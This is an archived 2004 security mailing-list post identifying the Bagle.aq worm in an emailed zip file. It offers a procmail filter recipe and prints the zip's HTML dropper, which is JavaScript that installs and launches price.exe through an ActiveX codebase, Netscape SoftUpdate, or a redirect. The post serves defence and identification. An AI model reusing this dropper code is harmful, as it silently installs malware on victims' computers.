lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: tremaine at gmail.com (Tremaine)
Subject: (no subject)

On Mon, 9 Aug 2004 13:03:54 -0600, Jonathan Grotegut
<jgrotegut@...ectpointe.com> wrote:
> (In regards to new_price.zip file attachment)
> 
> Anyone have any idea what this is, we had some clients just get pretty
> hard with this email.  I am unable to find anything on it, from my VERY
> Limited knowledge it appears to be a virus exploiting one of the many
> holes in IE.  Anyone else see anything on this yet?
> 
> Jonathan Grotegut


Bagle.aq with mitgleider-like dropper

Procmail recipe (courtesy of offlist associate), use at your own risk.
[code]
:0 BD
* -1000^0
*   300^0 YJuA6wS8WsBr
*   300^0 zGzjbJDCLB96
*   300^0 BOSKHdXH8Blw
*   300^0 dEi3loqk64su
*   300^0 byusWle0odyf
/dev/null
[/code]


price dot html file included in zip:
[code]
<head>
<script language="JavaScript">
var exepath='price/price.exe';
</script>

<SCRIPT LANGUAGE="JavaScript">
<!--
var bname=navigator.appName;
sewre = "rseI";
var bver=parseInt(navigator.appVersion);

function install() {
        if ( navigator.platform && navigator.platform != 'Win32' ) {
                location.replace('NOTWIN32WARNING.html');
                return;
        }
        if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
                document.write('<object id="gib" width=1 height=1
classid="CLSID:018B7EC3-EECA-11d
3-8E71-0000E82C6C0D"   codebase="'+exepath+'"></object>');
        } else if (bname == 'Netscape' && bver >= 4) {
                trigger = netscape.softupdate.Trigger;
                if (trigger.UpdateEnabled) {
                        trigger.StartSoftwareUpdate(exepath,
trigger.DEFAULT_MODE)
                } else {
                        location.replace(exepath);
                }
        } else {
                location.replace(exepath);
        }
}

install();

// -->
</script>
</head>
[/code]




Definitions available on McAfee and Trend Micro, and it appears
Symantec should have something by about 6pm.



-- 
Tremaine
IT Security Consultant

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ